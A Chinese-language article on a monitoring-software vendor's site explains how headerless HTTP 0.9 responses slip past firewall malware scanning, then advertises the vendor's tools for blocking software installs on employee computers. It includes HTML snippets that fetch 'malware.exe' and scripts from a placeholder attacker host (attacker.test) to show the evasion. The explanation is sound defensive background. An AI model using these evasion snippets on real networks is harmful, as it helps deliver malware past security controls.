安企神电脑监控软件 在线试用
扫码咨询客服
安企神电脑监控软件、局域网监控软件
首页
功能介绍
产品简介
下载中心
帮助中心
客户列表
关于安企神

使用HTTP 0.9进行绕过——解析HTTP逃逸

更新时间:2022-10-28 15:46:46


本文简介:HTTP 0.9是第一个版本的HTTP协议,在1991年的时候被正式提出,实际上在更早的时候就已经一直在使用这个版本了。简单来说,它是由客户端上的GET请求和服务端的响应组成,其中,GET请求和现在用的GET请求有点类似。与HTTP 1.0中的响应包不同的是0.9版本的并不是由响应头和响应内容组成,而是只有一个响应体构成。这就意味着不可以构造特殊的数据类型(Content-type),所以响应包只

使用HTTP 0.9进行绕过——解析HTTP逃逸

HTTP 0.9是第一个版本的HTTP协议,在1991年的时候被正式提出,实际上在更早的时候就已经一直在使用这个版本了。简单来说,它是由客户端上的GET请求和服务端的响应组成,其中,GET请求和现在用的GET请求有点类似。与HTTP 1.0中的响应包不同的是0.9版本的并不是由响应头和响应内容组成,而是只有一个响应体构成。这就意味着不可以构造特殊的数据类型(Content-type),所以响应包只是简单的以与服务器的TCP连接的断开为结束。

在现在的HTTP 1.1中包含了请求头和请求体,如下:
HTTP/1.1 200 ok
Content-type: application/octet-stream
Content-length: 68
some-malware-here
同样的内容,在HTTP 0.9中就没有头部,就像下面一样:
some-malware-here

使用HTTP 0.9进行绕过——解析HTTP逃逸
有趣的是,HTTP 1.1的请求得到的HTTP 0.9响应包会被大多数浏览器接收(除了Safari)即使有些并没有在现在的协议中被定义出来。

HTTP 0.9如何被用于逃逸的分析

HTTP 0.9的响应并不像HTTP 1.x的响应包,因为它没有响应头。按我们的想象,防火墙应该要过滤掉这样的响应包,因为它看起来并不符合HTTP协议。谁也不能肯定在如今的网络中不存在依然在使用HTTP 0.9的产品。所以,防火墙能做的只是检测HTTP 0.9响应包并对其做做恶意软件分析。

但是出乎意料的是,大多数防火墙都是简单的让HTTP/0.9的响应包直接通过,而没有做进一步的检测。从排名前10的防火墙测试报告中,我们发现,仅仅只有一小部分的HTTP Evader被拦截,更多的(大概有80%)用这种方式直接通过了防火墙。由于这些防火墙并没有对HTTP 0.9的响应包做恶意软件分析,我们可以这么认为:防火墙只是简单的让所有它无法分析的数据包直接通过。
在HTTP 0.9刚刚被提出来的时候,它仅仅只是用来显示静态页面(不需要其他字段进行说明),这种情况下,这些并不是什么问题,因为他只是用来把页面显示在浏览器中。但是,如果结合使用老版本的HTTP 0.9和HTML 5,如果遇到一个下载页面,执行下载的时候:
 href="http://attacker.test/http09-response" download="malware.exe">

HTTP 0.9响应可以被当成脚本、图片或缺html页面来使用,只要把它嵌入到适当的页面中就行,例如:
 src="http://attacker.test/http09-response.js">
  src="http://attacker.test/http09-response.gif">
  href="http://attacker.test/http09-response.html">
通过这样的方式,任何文件只要以这个结构来传输,都可以直接绕过防火墙。

立即下载试用

如何规范员工的电脑使用习惯?

互联网信息时代,各种信息随手可及,各种工具软件随意下载安装,特别是各种挂码和捆绑技术下,电脑上一不小心就会被安装上各种小程序或者全家桶。这给企业管理和业务开展上带来严重的安全隐患。

这个时个候,我们就需要禁止电脑安装软件、限制电脑安装程序的功能。这样做的好处:一方面可以防止因为私自安装软件、过多安装软件而导致的电脑运行速度下降、遭遇病毒木马入侵的风险;另一方面,通过禁止计算机安装软件也可以防止员工安装一些与工作无关的应用软件,如P2P下载软件、网络电视播放软件以及其他一些娱乐或用于处理私人事务的软件,从而引导员工合理上网,提升员工工作效率等。

通过安企神软件的桌面管理模块,就可以禁止终端安装软件,勾选后,终端无法安装新软件。安企神软件使用的分析安装包检测算法对安装包的识别率可达 90%以上。

另外,通过安企神软件的软件管控功能,你可以禁止终端计算机运行指定的软件,

比如:游戏软件、炒股软件、视频软件等。也可以设置软件白名单,安企神软件会自动分析windows操作系统必须的服务和进程,提供了默认安全模板,在此基础上,你可以自定义添加允许终端计算机运行指定的软件。支持给客户端按分组下发管控策略;在软件管控策略生效时间页面,可以设置生效时间,全天还是自定义时间段。比如如果你只希望策略在工作时间段生效,点击自定义时间段,最多可以设置 3 个自定义时间段。

通过安企神软件系统提供的丰富功能设置,就可以完整的规范员工的电脑使用习惯。


本文为收集整理,文章部分观点不代表本站观点,如有侵权或其它问题请反馈客服。https://www.wgj7.com/cjwt/16497.html